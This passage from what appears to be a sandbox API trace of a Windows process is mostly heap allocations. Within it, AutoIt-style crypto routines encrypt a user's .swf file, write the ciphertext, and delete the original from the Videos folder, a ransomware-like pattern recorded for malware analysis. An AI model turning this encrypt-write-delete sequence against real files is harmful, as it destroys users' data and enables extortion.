dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0107.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0107.639] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0107.639] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0710 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac900 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0107.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0107.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0107.640] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0107.640] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0107.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0107.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0107.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0107.640] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0xbdbc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0xbdc0) returned 1 [0107.640] CharLowerBuffW (in: lpsz="byte[48577]", cchLength=0xb | out: lpsz="byte[48577]") returned 0xb [0107.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0107.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0107.641] CryptEncrypt (in: hKey=0x41ac180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4539968*, pdwDataLen=0x144de30*=0xbdbc, dwBufLen=0xbdc0 | out: pbData=0x4539968*, pdwDataLen=0x144de30*=0xbdc0) returned 1 [0107.641] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0107.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0107.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.641] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xbdc0, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144e834*=0xbdc0, lpOverlapped=0x0) returned 1 [0107.643] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0107.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cacb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0107.643] CryptDestroyKey (hKey=0x41ac180) returned 1 [0107.643] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.643] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0107.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0107.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0107.643] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0107.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.644] FreeLibrary (hLibModule=0x756e0000) returned 1 [0107.644] CloseHandle (hObject=0x298) returned 1 [0107.644] CloseHandle (hObject=0x258) returned 1 [0107.646] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf", lpFilePart=0x0) returned 0x58 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0107.646] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\vbqewbi.swf")) returned 0x20 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a88c8 [0107.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0107.646] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad61f30, ftCreationTime.dwHighDateTime=0x1d5eb2c, ftLastAccessTime.dwLowDateTime=0xc34a6b00, ftLastAccessTime.dwHighDateTime=0x1d5ea38, ftLastWriteTime.dwLowDateTime=0xc34a6b00, ftLastWriteTime.dwHighDateTime=0x1d5ea38, nFileSizeHigh=0x0, nFileSizeLow=0xbdbc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="vBQeWbI.swf", cAlternateFileName="")) returned 0x41ac780 [0107.647] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\vbqewbi.swf")) returned 1 [0107.648] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ad61f30, ftCreationTime.dwHighDateTime=0x1d5eb2c, ftLastAccessTime.dwLowDateTime=0xc34a6b00, ftLastAccessTime.dwHighDateTime=0x1d5ea38, ftLastWriteTime.dwLowDateTime=0xc34a6b00, ftLastWriteTime.dwHighDateTime=0x1d5ea38, nFileSizeHigh=0x0, nFileSizeLow=0xbdbc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="vBQeWbI.swf", cAlternateFileName="")) returned 0 [0107.648] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8388 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0107.648] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0107.648] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0107.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0107.649] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0107.649] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0107.649] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0107.649] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0107.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0107.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0107.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27d0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0107.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0107.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0107.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0107.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0107.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0107.651] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0107.651] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0107.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0107.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0107.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0107.652] 